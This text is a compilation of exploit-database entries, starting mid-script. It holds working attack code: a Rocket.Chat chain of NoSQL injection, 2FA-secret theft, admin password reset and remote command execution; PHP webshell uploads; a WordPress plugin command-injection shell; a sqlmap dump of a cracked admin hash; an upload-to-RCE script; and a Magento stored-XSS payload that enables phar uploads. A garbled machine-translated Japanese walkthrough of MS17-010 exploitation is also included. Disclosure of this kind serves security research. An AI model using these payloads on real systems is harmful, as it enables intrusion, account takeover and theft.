string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def admin_token(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting reset token for admin cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.password.reset.token+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:89] print(f"Got the reset token: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token through blind nosql injection token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting admin reset token through nosql injection authenticated token = admin_token(target,lowprivmail) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticating and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1: # ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET['rev']); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2: # ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET['rev']); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user

# Exploit Title: WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2) # Date: 07.07.2021 # Exploit Author: Beren Kuday GORUN # Vendor Homepage: https://wordpress.org/plugins/plainview-activity-monitor/ # Software Link: https://www.exploit-db.com/apps/2e1f384e5e49ab1d5fbf9eedf64c9a15-plainview-activity-monitor.20161228.zip # Version: 20161228 and possibly prior # Fixed version: 20180826 # CVE : CVE-2018-15877 """ ------------------------- Usage: ┌──(root@kali)-[~/tools] └─# python3 WordPress-Activity-Monitor-RCE.py What's your target IP? 192.168.101.28 What's your username? mark What's your password? password123 [*] Please wait... [*] Perfect! www-data@192.168.101.28 whoami www-data www-data@192.168.101.28 pwd /var/www/html/wp-admin www-data@192.168.101.28 id uid=33(www-data) gid=33(www-data) groups=33(www-data) """ import requests from bs4 import BeautifulSoup def exploit(whoami, ip): while 1: cmd = input(whoami+"@"+ip+" ") url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' payload = "google.com.tr | " + cmd data = {'ip': payload , 'lookup' : 'lookup' } x = requests.post(url, data = data, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print(soup.p.text) def poc(ip): url = 'http://' + ip + '/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools' myobj = {'ip': 'google.fr | whoami', 'lookup' : 'lookup' } x = requests.post(url, data = myobj, cookies=getCookie(ip)) html_doc = x.text.split("<p>Output from dig: </p>")[1] soup = BeautifulSoup(html_doc, 'html.parser') print("[*] Perfect! ") exploit(soup.p.text, ip) def getCookie(ip): url = 'http://' + ip + '/wp-login.php' #log=admin&pwd=admin&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwordy%2Fwp-admin%2F&testcookie=1 data = {'log':username, 'pwd':password, 'wp-submit':'Log In', 'testcookie':'1'} x = requests.post(url, data = data) cookies = {} cookie = str(x.headers["Set-Cookie"]) for i in cookie.split(): if(i.find("wordpress") != -1 and i.find("=") != -1): cookies[i.split("=")[0]] = i.split("=")[1][:len(i.split("=")[1])-1] return cookies ip = input("What's your target IP?\n") username = input("What's your username?\n") password = input("What's your password?\n") print("[*] Please wait...") poc(ip)

# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip # Version: 1.0 # Tested on: Windows 10, XAMPP ################ # Description # ################ The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator. ########### # PoC # ########### Run sqlmap to dump username and password: $ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump ########### # Output # ########### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) web server operating system: Windows web application technology: PHP 5.6.24, Apache 2.4.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) current database: 'scheduler' Database: scheduler Table: users [1 entry] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | +----------+----------------------------------+ The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) # Exploit Author: Davide 'yth1n' Bianchin # Contacts: davide dot bianchin at dedagroup dot it # Original PoC: https://exploit-db.com/exploits/50103 # Date: 06.07.2021 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import os import sys import string import random import time host = 'localhost' #CHANGETHIS path = 'SourceCode' #CHANGETHIS url = 'http://'+host+'/'+path+'/pages/save_user.php' def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' if len(sys.argv) == 1: print("#########") print("Usage: python3 examhallrce.py command") print("Usage: Use the char + to concatenate commands") print("Example: python3 examhallrce.py whoami") print("Example: python3 examhallrce.py ls+-la") print("#########") exit() filename = id_generator() print("Generated "+filename+ " file..") time.sleep(2) print("Uploading file..") time.sleep(2) def reverse(): command = sys.argv[1] multipart_data = MultipartEncoder({ 'image': (filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream'), 'btn_save': '' }) r = requests.post(url, data=multipart_data, headers={'Content-Type':multipart_data.content_type}) endpoint = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'' urlo = 'http://'+host+'/'+path+'/uploadImage/Profile/'+filename+'?cmd='+command+'' print("Success, file correctly uploaded at: " +endpoint+ "") time.sleep(1) print("Executing command in 1 seconds:\n") time.sleep(1) os.system("curl -X GET "+urlo+"") reverse()

0x01序文 MS17-010のPSEXECは、Microsoft Windowsの最も人気のある2つの脆弱性を攻撃します。 CVE-2017-0146（EternalChampion/EternalSynergy） - トランザクションリクエストでレース条件を活用する CVE-2017-0143（ETERNALROMANCE/ETERNALSYNERGY） - レバレッジタイプのwriteandxと取引リクエストの間の難読化 EternalBlueと比較して、このモジュールには高い信頼性と優先度があり、パイプライン名を匿名ログインに使用できます（通常、VistaおよびWild Domainコンピューターの前のすべてが比較的一般的です）。 0x02利用条件 Exploit/Windows/SMB/MS17_010_PSEXECを使用できるようにするため： 有効なユーザー名とパスワードを使用して、これらの主要な要件をバイパスできます 1.ファイアウォールは、SMBトラフィックが入力して終了することを許可する必要があります 2。ターゲットはSMBV1プロトコルを使用する必要があります 3.ターゲットには、MS17-010パッチが欠落している必要があります 4.ターゲットは匿名のIPC $およびパイプライン名を許可する必要があります SMB MS17-010とPipe Auditor Assisted Scanモジュールを使用して、これらすべてを確認できます。 0x03オプション AngementPipeオプション----デフォルトで要求されるモジュールは、利用可能なパイプラインのパブラインリストをスキャンします。名前でパイプライン名を指定できます。 leakattempts option ---オプションは、脆弱性の安定性dbgtraceオプションを確保するために使用されます---オプション、デバッグ用に1に設定することをお勧めします。 smbuserオプション---オプション、win10上に有効なWindowsユーザー名を設定する必要があります SMBPASSオプション----オプション、Win10の上に制限されたWindowsパスワードを設定する必要があります 0x04テスト結果 1。最初に、スキャナー/SMB/PIPE_AUDITORモジュールを使用して、ターゲットネットワークセグメントホストの利用可能なパイプライン名をスキャンします。スキャンされたWindows 2003パイプライン名のほとんどは匿名です。より多くのパイプライン名をスキャンする必要がある場合は、利用可能なユーザー名とパスワードを提供する必要もあります。 2。ターゲットホストのパイプ名192.168.99.240を見ることができます。 3. MSFの下のExploit/Windows/SMB/MS17_010_PSEXECモジュールを介して、さらなる浸透が実行されます（MSFUPDateコマンドで更新するか、MSFを再ダウンロードしてインストールする必要があります） 4.ここでは、ターゲットホストIPアドレス、ポート、パイプライン名を設定する必要があります 5.最後に、ターゲットホストのshell:が正常に取得されました

# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) # Date: 2021-07-07 # Exploit Author: Patrik Lantz # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html # Version: <= 1.3.6 # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2 The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution. A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable the delivery of the XSS payload: POST /helpdesk/customer/ticket_save/ HTTP/1.1 Host: <redacted> Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635 Content-Length: 683 Origin: https://<redacted> Connection: close Referer: https://<redacted>/helpdesk/customer/ticket_view/ Cookie: <redacted> Upgrade-Insecure-Requests: 1 -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="form_key" <redacted> -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="object" Hello -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="message_cc" -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="content" <p><script>alert(1)</script></p> -----------------------------243970849510445067673127196635 Content-Disposition: form-data; name="hideit" -----------------------------243970849510445067673127196635-- The following XSS payload shown below can be used to trigger 1) Enabling file attachments in ticket messages 2) Adding 'phar' to allowed file extensions 3) Setting the attachment directory to 'helpdesk/files/../../../pub' <script> function successListener(e) { var doc = e.target.response var action=doc.getElementById('config-edit-form').action; function submitRequest() { var formKey = FORM_KEY; var xhr = new XMLHttpRequest(); xhr.open("POST", action, true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053"); xhr.withCredentials = true; var body = "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"form_key\"\r\n" + "\r\n" + formKey + "\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + "\r\n" + "3\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + "\r\n" + "10000\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + "\r\n" + "Support - My Tickets\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + "\r\n" + "jpeg,gif,png,pdf,phar\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + "\r\n" + "helpdesk/files/../../../pub\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + "\r\n" + "2M\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + "\r\n" + "4M\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + "\r\n" + "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + "Your message has been sent to the support team.\r\n" + "Here is the message content:\x3cbr/\x3e\r\n" + "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + "Kind Regards,\r\n" + "The Support Team.\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + "\r\n" + "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + "Regards,\r\n" + "The Support Team.\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------14303502862141221692667966053\r\n" + "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + "\r\n" + "You received a new message from a customer.\r\n" + "-----------------------------14303502862141221692667966053--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); } var request = new XMLHttpRequest(); request.onload = successListener; request.responseType = 'document'; request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true); request.send(); </script> After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the URL, for example: https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/ and the messageId can be identified by hovering over the uploaded file link which will be similar to https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar in this case, the messageId is 40.